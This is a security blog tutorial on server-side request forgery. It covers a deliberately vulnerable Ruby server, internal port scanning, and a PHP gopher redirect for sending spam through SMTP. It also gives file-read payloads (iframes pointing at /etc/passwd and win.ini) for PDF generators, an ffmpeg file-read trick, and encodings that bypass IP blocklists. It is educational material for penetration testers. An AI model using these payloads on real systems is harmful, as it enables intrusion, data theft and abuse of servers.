SSRF – Server Side Request Forgery Types And Ways To Exploit It (Part-2)

Security Coding
Security Coding

We have discussed Basic SSRF in Part -1, now we will continue with its next part

ii. Blind –

Not all SSRF vulnerabilities return the response to the attacker. This type of SSRF is known as blind SSRF

Exploiting Blind SSRF –
DEMO (using Ruby)

require 'sinatra'
require 'open-uri'

get '/' do
open params[:url]

The above code runs a server on port 4567 which on getting request does the following:
> make request to URL mentioned by user
> send reponse “OK” back to user instead of content(CANT SEE RESPONSE)

http://localhost:4567/?url= will request but does not show the response from google to attacker

To demonstrate impact with this kind of SSRF is to run an Internal IP and PORT scan

Here’s a list of private IPv4 networks that you could scan for services:


We can determine whether the specified PORT is Open/Closed by observing the Response Status and Response Time

Below is the example table of response status and time

Send Spam mails –

In some case if the server supports Gopher we use it to send spam mails from server IP

To demonstrate we will use testing server.

Let’s craft a malicious php page :

$commands = array(
'MAIL FROM: <[email protected]>',
'RCPT TO: <[email protected]>',
'Test mail',
$payload = implode('%0A', $commands);
header('Location: gopher://'.$payload);

This code concats our SMTP command into one line delimited by %0A and forces server to send a ‘GOPHER’ request to a SMTP server while actually sending a valid SMTP request

Performing Denial of service –

An attacker can use iptables TARPIT target to block requests for a prolonged time and CURL’s FTP:// protocol which never timeouts.

An attacker can send all TCP traffic to port 12345 to TARPIT and the request

Test Cases –
Places to look for SSRF

End points which fetch external/internal resources –
Case I-

Refer – Link

Case -II

Try changing urls in POST request

POST /test/demo_form.php HTTP/1.1

Refer – #411865, Link

PDF generators –

There are some cases where server converts uploaded file to a pdf

Try injecting <iframe>, <img>, <base> or <script> elements or CSS url() functions pointing to internal services.

You can read internal files using this

<iframe src=”file:///etc/passwd” width=”400" height=”400">
<iframe src=”file:///c:/windows/win.ini” width=”400" height=”400">

Refer – Link

File uploads -
Instead of uploading try changing input type to URL and check if the server sends a request to it

<input type=”file” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>
to <input type=”url” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>
and Pass the URL

Here’s an example.

Video Conversion –

There are many applications using outdated version ffmpeg to convert videos from one format to other

There is know SSRF vulnerability in this

Clone neex repo and generate an avi using below command

./ file://<filename> file_read.avi

and upload it in the vulnerable server and try converting it from avi to mp4

this reads can be used to read internal file and write in to the video

Refer – #237381 , #226756

Know SSRF vulnerabilities in CMS ,Plugins, Themes.

This is limited to your search knowledge

CVE - Search Results

Common Vulnerabilities and Exposures (CVE®) is a list of entries - each containing an identification number, a… 

WordPress Vulnerability Search 

3. Bypass Whitelisting and Blacklisting –

Lets talk about whitelisting and blacklisting first

whitelisting – Allowing specific URL’s (Allowed Hosts)

Lets say if a server whitelist and u can fetch only using SSRF and rest all other domains get rejected

The only way to bypass whitelisting is find an open redirect in the whitelisted domain. Lets look in to example

Case – 1 whitelisted and you found SSRF in -Fails to fetch as it is not whitelisted - Successfully fetches

Case – 2 whitelisted * and you found SSRF in -Fails to fetch as it is not whitelisted

This can be bypassed if you get any subdomain takeover on *

and use it to iframe or redirect it to desired site — Successfully fetches

blacklisting – Blocking specific URL’s (Disallowed Hosts)

In the same way if a server blacklist and when you ask the server to fetch it blocks

Blacklisting can be bypassed in many ways

Converting IP to hexadecimal –

example – converting to doted hex – http://c0.a8.00.01 and dot less hex http://0xc0a80001

Converting IP to Decimal –

Use any online convertors ( Link )

http://0177.0.0.1/ =
http://2130706433/ =
http://3232235521/ =
http://3232235777/ =

Converting IP to Octal –

example — converting to doted octal http://0300.0250.0000.0001 and dot less http://030052000001

Refer – #288250

Using wildcard DNS –

There are many sites online provide wildcard DNS, some of them are wildcard DNS for everyone

What is is a magic domain name that provides wildcard DNS for any IP address. Say your LAN IP address…

NIP.IO – wildcard DNS for any IP Address

NIP.IO allows you to map any IP Address in the following DNS wildcard entries:

The DNS server of serves AAAA records for every IPv6 address in existence. Think, but for IPv6.

Welcome to

You can simply use them to point it to a specific IP resolves to resolves to resolves to resolves to resolves to resolves to

Or you can use your own domain to do this

Make a subdomain and point to with DNS A record

Refer:- #288193 , #288183

Using enclosed alphanumerics –

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ =

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

End of Part -2

About The Author

Santhosh Kumar, he is an experienced Security Researcher with a demonstrated history of working in the computer and network security industry. Strong information technology professional skilled in Penetration Testing, Cryptography, Application Security, Web Application Security, and Ethical Hacking.
For the latest update about Cyber and Infosec World, follow us on Twitter, Facebook, Telegram , Instagram and subscribe to our YouTube Channel.
More from Chandrakant Patil

Free Decryption Tool Released For GrandCrab Ransomware

GrandCrab Ransomware decryption utility developed by Bitdefender, Europol, the Romanian Police and...
Read More

Leave a Reply